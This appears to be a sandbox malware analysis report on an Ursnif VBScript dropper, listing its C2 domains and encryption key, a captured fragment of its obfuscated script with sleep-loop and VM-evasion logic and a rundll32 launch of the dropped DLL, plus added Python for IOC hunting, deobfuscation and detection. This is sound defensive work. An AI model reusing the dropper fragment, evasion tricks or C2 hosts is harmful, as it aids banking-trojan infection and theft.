Analysis Report Attachment_32954.vbs

Overview

General Information

Sample Name: Attachment_32954.vbs
Analysis ID: 384531
MD5: 39eb3427fd329de93a19190d84273710
SHA1: 5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256: adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
Tags: vbs
Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Deletes itself after installation
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 20.2.rundll32.exe.48f94a0.3.raw.unpack Malware Configuration Extractor: Ursnif [{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]
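The extracted configuration above is the most actionable part of this report: three C2 hosts, all serving under /api1, plus the botnet and server identifiers. The following Python is an added example, not part of the Joe Sandbox report and not Ursnif's own code. It parses the configuration exactly as printed, derives host and path IOCs from the c2_domain entries, and runs them as a case-insensitive matcher over a few proxy-log lines. The log lines are constructed for the demonstration; the configuration values are copied from the report.

```python
import json
import re
from urllib.parse import urlsplit

# Configuration copied verbatim from the report's "Found malware configuration" entry.
URSNIF_CONFIG = '''[{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]'''


def parse_config(raw: str) -> dict:
    """Merge the list of dicts the extractor prints into one flat dict."""
    merged = {}
    for part in json.loads(raw):
        merged.update(part)
    return merged


def c2_iocs(config: dict) -> list:
    """Return (host, path) pairs from the c2_domain entries.

    Entries carry no scheme, so one is prepended before splitting. The path
    is kept because every C2 in this configuration sits under /api1.
    """
    pairs = []
    for entry in config.get("c2_domain", []):
        parts = urlsplit("http://" + entry)
        pairs.append((parts.hostname.lower(), parts.path or "/"))
    return pairs


def build_matcher(pairs):
    """Compile one regex that hits on host + path prefix, case-insensitively."""
    alternatives = [re.escape(h) + re.escape(p) for h, p in pairs]
    return re.compile(r"(?i)\b(?:" + "|".join(alternatives) + r")(?:[/?]|\b)")


def hunt(log_lines, config: dict) -> list:
    """Return the log lines whose URL matches a configured C2 host and path."""
    matcher = build_matcher(c2_iocs(config))
    return [line for line in log_lines if matcher.search(line)]


# Constructed proxy-log lines (Squid-like), invented for this example.
SAMPLE_LOG = [
    "1617958801.123 10.0.0.5 TCP_MISS/200 GET http://api10.laptok.at/api1/images/x.gif",
    "1617958802.456 10.0.0.5 TCP_MISS/200 GET http://www.example.com/index.html",
    "1617958803.789 10.0.0.7 TCP_MISS/404 GET http://GO.IN100K.AT/api1/",
    "1617958804.000 10.0.0.7 TCP_MISS/200 GET http://laptok.at/api1/",
]

if __name__ == "__main__":
    cfg = parse_config(URSNIF_CONFIG)
    for host, path in c2_iocs(cfg):
        print(f"C2 host={host} path={path} botnet={cfg['botnet']} server={cfg['server']}")
    for hit in hunt(SAMPLE_LOG, cfg):
        print("HIT:", hit)
```

The matcher anchors on the full host so that the bare registered domain (laptok.at in the last sample line) does not fire on its own; widen it deliberately if the hunt should cover sibling subdomains. The sample has no network activity in the sandbox (see "No contacted IP infos" at the end of the report), so the configuration is the only source of network IOCs here.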
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg Metadefender: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: Attachment_32954.vbs Virustotal: Detection: 36%
Source: Attachment_32954.vbs Metadefender: Detection: 16%
Source: Attachment_32954.vbs ReversingLabs: Detection: 31%

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

System Summary:

Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7025161B GetProcAddress,NtCreateSection,memset, 20_2_7025161B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702515D9 NtMapViewOfSection, 20_2_702515D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702523C5 NtQueryVirtualMemory, 20_2_702523C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 20_2_00DC11A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCB159 NtQueryVirtualMemory, 20_2_00DCB159
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702521A4 20_2_702521A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC28E9 20_2_00DC28E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCAF34 20_2_00DCAF34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A466E 20_2_702A466E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70290FE0 20_2_70290FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A7120 20_2_702A7120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029BA3F 20_2_7029BA3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702AA29E 20_2_702AA29E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702AA3BE 20_2_702AA3BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A75B8 20_2_702A75B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029B7DA 20_2_7029B7DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702AB7DF 20_2_702AB7DF
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Rabin.dmg 94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 70294250 appears 39 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Attachment_32954.vbs Initial sample: Strings found with length greater than 50
Source: Rabin.dmg.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal92.troj.evad.winVBS@5/8@0/0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 20_2_00DC31DD
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Attachment_32954.vbs Static file information: File size 1444626 > 1048576
Source: Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface:
WScript.Sleep 7000
End With
' pervasive glasswort corrector dinghy gander Oedipus mattress morrow Francis vibrato lawman Omaha pledge madstone grub ampersand
heredity = 0
REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary, 1016749 barbarous recalcitrant
grove = 1000
Do While heredity < 100000000
REM impetus Roth fudge souffle decorous Pravda inglorious calculate Paraguayan magnum repairmen Nassau
If (heredity = 100000000) Then
WScript.Quit
' KS decolletage Moiseyev nameable. Madeline Ellen script catastrophic hardwood Hankel tempest scriptural prime blab Hodges
End If
If (heredity = 5000000) Then
grove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))
End If
If (heredity = 200) Then
Exit Do
End if
REM room Bohr. shard Germany nightmare standoff. 3540175 tetrahedron, 3863241 holler ailanthus spillover marriage stimulant lacrosse handicraftsman
heredity = heredity + 1
Loop
REM shad eventide hour800 vicissitude Aeneas fledge reflectance bicep optimism enfant swirl, messieurs floorboard, Middletown Mira Ankara
With WScript
.Sleep 5000
End With
End Function
Function hideout655()
REM eyeball knack isomer chromatin Nassau692 Pangaea astonish. caliph, critic oedipal bravo
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
REM Iliad rennet manioc. visitor bootleg hart slaughterhouse, insurrect, 5691938 jejune clam exterior Rabin176 painstaking
MsgBOX("RUN")
Exit Function
End If
moan("1")
Set restaurant = CreateObject("WScript.Shell")
restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"
prime623
End Function
Function artful(dermatology, stagnant)
Dim Byronic, deviate
Set Byronic = CreateObject("Scripting.FileSystemObject")
Set deviate = Byronic.CreateTextFile(dermatology, True)
Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))
Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))
For Each soulful In stagnant
REM Barr meteorite resonate cabdriver Lysenko sycophantic, 7200240 busywork tremendous facade xylophone locksmith inch
Randomize
REM boggy255 tomography pander notebook. 7111724 contour strum period Reese Ouagadougou onrushing pathogenic
fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)
If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Then
deviate.WriteLine(soulful)
ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Then
deviate.Write soulful + ":"
Else
deviate.Write soulful
deviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))
End If
Next
deviate.Close
' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact. linoleum Sagittarius downhill
End Function
Function Gerhard()
on error resume next
' extensible Gibson spiderwort Datsun Barbara telemeter Costello Enoch. plume tribesmen jot sergeant mack Kirkland marriage649
Dim Aides: Set Aides = CreateObject("Scripting.FileSystemObject")
' granular perspicacious Zanzibar indisposition oviform riverbank hasten. petunia kittenish tire gemsbok, 98142
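The AMSI buffer shows the dropper's two obfuscation habits: junk comment lines (REM and ') built from dictionary words, and integer constants hidden behind parenthesised float arithmetic such as (((90 + 1660.0) - (306 - 101.0)) - 1445.0). The following Python is an added example, not part of the report or of the sample: it strips the comments, folds every purely numeric parenthesised group with a restricted AST evaluator (no eval), and lists the statements that touch CreateObject, .Run, WScript.Sleep/Quit/ScriptName or rundll32. SAMPLE_VBS is a constructed excerpt of the statements quoted above with line breaks restored by hand; the identifiers are the sample's own.

```python
import ast
import operator
import re

# Constructed sample: statements from the AMSI buffer quoted above, with line
# breaks restored by hand (the report prints the buffer as run-on text).
SAMPLE_VBS = r"""
heredity = 0
REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary
grove = 1000
Do While heredity < 100000000
If (heredity = 5000000) Then
grove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))
End If
If (heredity = 200) Then
Exit Do
End if
heredity = heredity + 1
Loop
Function hideout655()
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
MsgBOX("RUN")
Exit Function
End If
Set restaurant = CreateObject("WScript.Shell")
restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"
End Function
Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))
Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))
fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)
If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Then
deviate.WriteLine(soulful)
ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Then
deviate.Write soulful + ":"
Else
deviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))
End If
' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact
"""

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}

# Innermost parenthesised group made only of numeric literals and + - * /.
# The look-behind keeps us out of calls such as WriteBlankLines(1).
_NUM = r"-?\d+(?:\.\d+)?"
_GROUP = re.compile(r"(?<![\w.])\(\s*(" + _NUM + r"(?:\s*[-+*/]\s*" + _NUM + r")*)\s*\)")


def _safe_eval(expr: str) -> float:
    """Evaluate arithmetic via the AST, allowing only numbers, unary sign and + - * /."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            v = walk(node.operand)
            return -v if isinstance(node.op, ast.USub) else v
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported node {type(node).__name__}")
    return walk(ast.parse(expr, mode="eval"))


def _fmt(v: float) -> str:
    return str(int(v)) if float(v).is_integer() else repr(v)


def fold_constants(line: str) -> str:
    """Collapse innermost numeric groups repeatedly until the line stops changing."""
    while True:
        new = _GROUP.sub(lambda m: _fmt(_safe_eval(m.group(1))), line)
        if new == line:
            return new
        line = new


def strip_comment(line: str) -> str:
    """Drop REM lines and anything after a ' that sits outside a double-quoted string."""
    if re.match(r"\s*rem\b", line, re.IGNORECASE):
        return ""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i].rstrip()
    return line.rstrip()


SUSPICIOUS = re.compile(r"CreateObject|\.Run\b|WScript\.(Sleep|Quit|ScriptName)|MsgBox|rundll32", re.I)


def deobfuscate(script: str):
    """Return (cleaned lines, lines worth a second look)."""
    cleaned = [fold_constants(strip_comment(raw)) for raw in script.splitlines()
               if strip_comment(raw).strip()]
    return cleaned, [l for l in cleaned if SUSPICIOUS.search(l)]


if __name__ == "__main__":
    lines, flagged = deobfuscate(SAMPLE_VBS)
    print("\n".join(lines))
    print("\n-- flagged --\n" + "\n".join(flagged))
```

Folding makes the logic legible: pawpaw = 300, felsite506 = 0, the Rnd draw is compared against 100, and the ElseIf condition (> 100 And < 100) can never hold, so the writer only ever chooses between WriteLine and Write followed by one blank line. The counting loop leaves at heredity = 200 via Exit Do, so the 100000000 bound is decoration. The InStr(WScript.ScriptName, "TESTING") branch exits before the rundll32 launch whenever the file has been renamed to contain TESTING, which an analyst renaming the sample can trip by accident.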
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70252193 push ecx; ret 20_2_702521A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70252140 push ecx; ret 20_2_70252149
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCABF0 push ecx; ret 20_2_00DCABF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCAF23 push ecx; ret 20_2_00DCAF33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70264AB7 push ebx; ret 20_2_70264AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70265B21 push edi; ret 20_2_70265B3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70266BBB push ebx; retf 20_2_70266BBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702ABF08 push ecx; ret 20_2_702ABF06

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg
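Two facts in this report are the ones a detection engineer would encode: a script host (wscript.exe) wrote a PE into %TEMP% under a non-PE extension (.dmg), and then launched rundll32.exe on that file with the DllRegisterServer export (the 64-bit rundll32 relaunching the SysWOW64 copy, seen in the System Summary, is normal for a 32-bit module and not itself suspicious). The Python below is an added example, not part of the report or of any vendor tool: it applies both checks to constructed process-creation and file-creation events modelled on the entries above. The event field names and the sample events are assumptions for the demonstration; the paths and command line are the report's.

```python
import ntpath
from dataclasses import dataclass

# Extensions a PE image is normally loaded from; an MZ file under anything
# else (Rabin.dmg in this report) is a content/extension mismatch.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class ProcessEvent:            # assumed shape, modelled on a Sysmon process-create event
    parent_image: str
    image: str
    command_line: str


@dataclass
class FileCreateEvent:         # assumed shape: writer, path, first bytes written
    image: str
    target: str
    header: bytes


def _first_token(cmd: str):
    """Split off the first command-line token, honouring a quoted image path."""
    cmd = cmd.lstrip()
    if cmd[:1] in ('"', "'"):
        end = cmd.find(cmd[0], 1)
        return cmd[1:end], cmd[end + 1:].lstrip()
    head, _, rest = cmd.partition(" ")
    return head, rest.lstrip()


def rundll32_module(command_line: str):
    """Return (module, export) for 'rundll32.exe <module>,<export>', else None."""
    image, rest = _first_token(command_line)
    if ntpath.basename(image).lower() != "rundll32.exe" or not rest:
        return None
    arg, _ = _first_token(rest)
    module, _, export = arg.partition(",")
    return module, export


def check_process(ev: ProcessEvent):
    findings = []
    parent = ntpath.basename(ev.parent_image).lower()
    loaded = rundll32_module(ev.command_line)
    if ntpath.basename(ev.image).lower() == "rundll32.exe" and loaded:
        module, export = loaded
        ext = ntpath.splitext(module)[1].lower()
        if ext not in PE_EXTENSIONS:
            findings.append(f"rundll32 loading module with extension '{ext}': {module}")
        if parent in SCRIPT_HOSTS:
            findings.append(f"rundll32 spawned by script host {parent}, export {export or '?'}")
    return findings


def check_file(ev: FileCreateEvent):
    findings = []
    ext = ntpath.splitext(ev.target)[1].lower()
    writer = ntpath.basename(ev.image).lower()
    if ev.header[:2] == b"MZ":
        if ext not in PE_EXTENSIONS:
            findings.append(f"PE content written under extension '{ext}': {ev.target}")
        if writer in SCRIPT_HOSTS:
            findings.append(f"script host {writer} dropped a PE: {ev.target}")
    return findings


def triage(events):
    out = []
    for ev in events:
        out.extend(check_process(ev) if isinstance(ev, ProcessEvent) else check_file(ev))
    return out


# Constructed events mirroring the report's "File created" and "Process created" lines.
SAMPLE_EVENTS = [
    FileCreateEvent(r"C:\Windows\System32\wscript.exe",
                    r"C:\Users\user\AppData\Local\Temp\Rabin.dmg", b"MZ\x90\x00\x03"),
    FileCreateEvent(r"C:\Windows\System32\wscript.exe",
                    r"C:\Users\user\AppData\Local\Temp\adobe.url", b"[InternetShortcut]"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer'),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

The extension check on the rundll32 argument is deliberately independent of the parent-process check: the second rundll32 in the chain has rundll32 as its parent and would otherwise be missed, while the benign shell32.dll,Control_RunDLL event produces nothing. The file rule needs the first bytes of the written file, which a sandbox provides directly and an EDR provides through its file-content or magic-type field.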

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\attachment_32954.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4120 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 20_2_00DC3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A088D FindFirstFileExW, 20_2_702A088D
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029FAB7 IsDebuggerPresent,OutputDebugStringW, 20_2_7029FAB7
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A0417 mov eax, dword ptr fs:[00000030h] 20_2_702A0417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A045B mov eax, dword ptr fs:[00000030h] 20_2_702A045B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702A048C mov eax, dword ptr fs:[00000030h] 20_2_702A048C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70299DD7 mov eax, dword ptr fs:[00000030h] 20_2_70299DD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702C204F mov eax, dword ptr fs:[00000030h] 20_2_702C204F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702C1C56 push dword ptr fs:[00000030h] 20_2_702C1C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_702C2390 mov eax, dword ptr fs:[00000030h] 20_2_702C2390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7029400F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_7029400F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70294667 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_70294667
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70299747 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_70299747

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Rabin.dmg.1.dr
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCA12A cpuid 20_2_00DCA12A
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 20_2_7025111B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,GetLocaleInfoW, 20_2_7029D950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_702A4BBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesEx, 20_2_7029D7FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 20_2_702A5223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_702A5349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_7029D3D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 20_2_702A544F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_702A551E
